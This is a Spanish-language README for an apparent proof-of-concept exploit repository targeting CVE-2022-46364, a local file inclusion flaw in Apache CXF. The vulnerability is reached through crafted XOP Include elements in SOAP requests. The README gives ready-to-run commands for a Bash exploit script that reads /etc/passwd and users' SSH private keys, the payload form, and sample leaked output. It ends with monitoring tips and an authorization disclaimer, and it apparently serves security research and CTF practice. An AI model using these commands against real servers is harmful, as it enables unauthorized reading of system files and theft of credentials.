
Exploit de prueba de concepto para CVE-2022-46364, una vulnerabilidad de inclusión de archivos locales en Apache CXF a través de elementos XOP Include manipulados en solicitudes SOAP. Incluye un script de exploit en Bash para leer archivos arbitrarios del servidor.
Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2022-46364, una vulnerabilidad de Inclusión de Archivos Locales (LFI) en Apache CXF.
La vulnerabilidad surge debido al manejo inadecuado de los elementos XOP (XML-binary Optimized Packaging) Include en las solicitudes SOAP, permitiendo a los atacantes leer archivos arbitrarios del servidor.
Apache CXF procesa incorrectamente los elementos <xop:Include> dentro de las solicitudes SOAP.
Al proporcionar un href manipulado (por ejemplo, file:///etc/passwd), el servidor puede incluir y devolver el contenido de archivos locales.
Siempre verifique la versión vulnerable exacta en su entorno objetivo.
<xop:Include href="file:///path/to/file">.
├── cxf_lfi.sh # Exploit script
├── README.md # Documentation
├── LICENSE # MIT License
└── .gitignore
chmod +x cxf_lfi.sh
Actualice el objetivo dentro del script:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Algunos servidores pueden:
file://El análisis de la salida depende del formato de la respuesta y puede requerir inspección manual.
Monitoree solicitudes SOAP inusuales que contengan:
<xop:Include>file:// URIsEste proyecto está destinado a:
No use esta herramienta en sistemas sin permiso explícito.
Desarrollado como parte de investigación de seguridad y práctica de CTF.